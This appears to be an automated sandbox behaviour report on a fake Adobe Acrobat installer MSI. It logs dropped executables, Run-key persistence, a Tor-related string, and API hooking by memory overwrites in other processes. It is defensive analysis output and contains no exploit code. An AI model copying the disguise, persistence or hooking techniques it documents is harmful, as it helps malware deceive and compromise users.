Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\Adobe_Acrobate_Reader_Pro-HAv70.msi"
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 8E3B84DC866BDAAB5E29174467276D64
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe "C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe "C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe"
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 8E3B84DC866BDAAB5E29174467276D64	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Jump to behavior

Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: Adobe_Acrobate_Reader_Pro-HAv70.msi

Static file information: File size 41085952 > 1048576

Source:	Binary string: r:\Case\Projects\sly\AnyDVDhd\AnyTool\Release\AnyTool.pdb$ source: Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.000000000181D000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: r:\Case\Projects\sly\AnyDVDhd\AnyTool\Release\AnyTool.pdb source: Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.000000000181D000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: Adobe_Acrobate_Reader_Pro-HAv70.msi, MSIDF32.tmp.1.dr, 64d7bc.msi.1.dr

Source: initial sample

Static PE information: section where entry point is pointing to: .E k

Source: Adobe Acrobat Pro.exe.1.dr	Static PE information: section name: .didata
Source: avutil.dll.1.dr	Static PE information: section name: .didata
Source: avutil.dll.1.dr	Static PE information: section name: .l*m
Source: avutil.dll.1.dr	Static PE information: section name: .)3i
Source: avutil.dll.1.dr	Static PE information: section name: .E k

Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1AD67A8F push ss; retf	8_2_1AD67A91
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1AD67AB7 push ss; retf	8_2_1AD67A91
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1AD68235 push ecx; iretd	8_2_1AD68236
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1AD603D1 push 32B21ECCh; retf	8_2_1AD603D7
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1AD67F63 push 9923F09Bh; mov dword ptr [esp], edi	8_2_1AD68058
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1AD659DC push edi; ret	8_2_1AD659DD
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1AD66111 push dword ptr [bp+di]; retf	8_2_1AD6611D
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1AD6050A push ds; ret	8_2_1AD6050B
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_19CC1C43 push dword ptr [ebx]; retf	8_2_19CC1C4F
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B398AAF push ds; iretd	8_2_1B398AD4
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B39788D push 3A1FA200h; mov dword ptr [esp], esi	8_2_1B3978C1
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3A7F93 push ds; iretd	8_2_1B3A7F94
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B39BE49 push dword ptr [edx]; ret	8_2_1B39BE5C
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3AC315 push B62CDD09h; mov dword ptr [esp], esi	8_2_1B3AC324
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3A808C push edx; retf	8_2_1B3A808F
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3A6575 push eax; mov dword ptr [esp], 3ABC2F10h	8_2_1B3A660B
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3A546A pushad ; retf	8_2_1B3A5472
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1B3C644D push dword ptr [ebx]; ret	8_2_1B3C6454
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1A75FA19 push ebp; iretd	8_2_1A75FA1A
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1A75FB1F push dword ptr [edx]; ret	8_2_1A75FB27
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1A762BF0 pushfd ; ret	8_2_1A762BF1
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1A75E7D1 push FFFFFF80h; retf	8_2_1A75E7D3
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1A75F7DD pushfd ; ret	8_2_1A75F7DE
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1A75E815 pushad ; ret	8_2_1A75E826
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1A75BDAC push dword ptr [edx]; ret	8_2_1A75BDB7
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1A76019B push dword ptr [edx]; ret	8_2_1A76019E
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1ADB17D2 push es; ret	8_2_1ADB17DC
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1ADB3F72 push esp; retf	8_2_1ADB3FA2
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1ADB88A7 push edx; retf	8_2_1ADB88A8
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1ADB9053 push cs; ret	8_2_1ADB9059
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1ADC0013 push edx; retf	8_2_1ADC001F

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIDF32.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIDE94.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIDEC4.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\avutil.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIDD98.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIDE35.tmp	Jump to dropped file

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIDF32.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIDE94.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIDEC4.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIDD98.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIDE35.tmp	Jump to dropped file

Source: C:\Windows\System32\msiexec.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Adobe Acrobat Reader\Microsoft\Windows\CurrentVersion\Run suporte	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Adobe Acrobat Reader\Microsoft\Windows\CurrentVersion\Run suporte	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Adobe Acrobat Pro.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Adobe Acrobat Pro.exe	Jump to behavior

Hooking and other Techniques for Hiding and Protection

May use the Tor software to hide its network traffic

Source: Adobe Acrobat Pro.exe, 00000003.00000000.1681304324.0000000000401000.00000020.00000001.01000000.00000003.sdmp

Binary or memory string: torConnect

Overwrites code with function prologues

Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 6764 base: 76ECBA30 value: 8B FF 55 8B EC	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 6764 base: 75BF4D90 value: 8B FF 55 8B EC	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 6764 base: 75C0EBF0 value: 8B FF 55 8B EC	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 6764 base: 74FD8A90 value: 8B FF 55 8B EC	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 6764 base: 75000230 value: 8B FF 55 8B EC	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3156 base: 76ECBA30 value: 8B FF 55 8B EC	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3156 base: 75BF4D90 value: 8B FF 55 8B EC	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3156 base: 75C0EBF0 value: 8B FF 55 8B EC	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3156 base: 74FD8A90 value: 8B FF 55 8B EC	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3156 base: 75000230 value: 8B FF 55 8B EC	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3328 base: 76ECBA30 value: 8B FF 55 8B EC	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3328 base: 75BF4D90 value: 8B FF 55 8B EC	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3328 base: 75C0EBF0 value: 8B FF 55 8B EC	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3328 base: 74FD8A90 value: 8B FF 55 8B EC	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3328 base: 75000230 value: 8B FF 55 8B EC	Jump to behavior

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 6764 base: 75F0005 value: E9 8B 2F 91 6F	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 6764 base: 76F02F90 value: E9 7A D0 6E 90	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 6764 base: 7600007 value: E9 EB DF 93 6F	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 6764 base: 76F3DFF0 value: E9 1E 20 6C 90	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 6764 base: 7610005 value: E9 2B BA 8B 6F	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 6764 base: 76ECBA30 value: E9 DA 45 74 90	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 6764 base: 7630008 value: E9 8B 8E 8E 6F	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 6764 base: 76F18E90 value: E9 80 71 71 90	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 6764 base: 7640005 value: E9 8B 4D 5B 6E	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 6764 base: 75BF4D90 value: E9 7A B2 A4 91	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 6764 base: 7650005 value: E9 EB EB 5B 6E	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 6764 base: 75C0EBF0 value: E9 1A 14 A4 91	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 6764 base: 7660005 value: E9 8B 8A 97 6D	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 6764 base: 74FD8A90 value: E9 7A 75 68 92	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 6764 base: 7670005 value: E9 2B 02 99 6D	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 6764 base: 75000230 value: E9 DA FD 66 92	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3156 base: 5DA0005 value: E9 8B 2F 16 71	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3156 base: 76F02F90 value: E9 7A D0 E9 8E	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3156 base: 5DB0007 value: E9 EB DF 18 71	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3156 base: 76F3DFF0 value: E9 1E 20 E7 8E	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3156 base: 5DC0005 value: E9 2B BA 10 71	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3156 base: 76ECBA30 value: E9 DA 45 EF 8E	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3156 base: 5DF0008 value: E9 8B 8E 12 71	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3156 base: 76F18E90 value: E9 80 71 ED 8E	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3156 base: 5E00005 value: E9 8B 4D DF 6F	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3156 base: 75BF4D90 value: E9 7A B2 20 90	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3156 base: 5E10005 value: E9 EB EB DF 6F	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3156 base: 75C0EBF0 value: E9 1A 14 20 90	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3156 base: 5E20005 value: E9 8B 8A 1B 6F	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3156 base: 74FD8A90 value: E9 7A 75 E4 90	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3156 base: 5E30005 value: E9 2B 02 1D 6F	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3156 base: 75000230 value: E9 DA FD E2 90	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3156 base: 5EF0005 value: E9 8B 2F 01 71	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3156 base: 76F02F90 value: E9 7A D0 FE 8E	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3156 base: 5F00007 value: E9 EB DF 03 71	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3156 base: 76F3DFF0 value: E9 1E 20 FC 8E	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3156 base: 5F10005 value: E9 2B BA FB 70	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Memory written: PID: 3156 base: 76ECBA30 value: E9 DA 45 04 8F	Jump to behavior
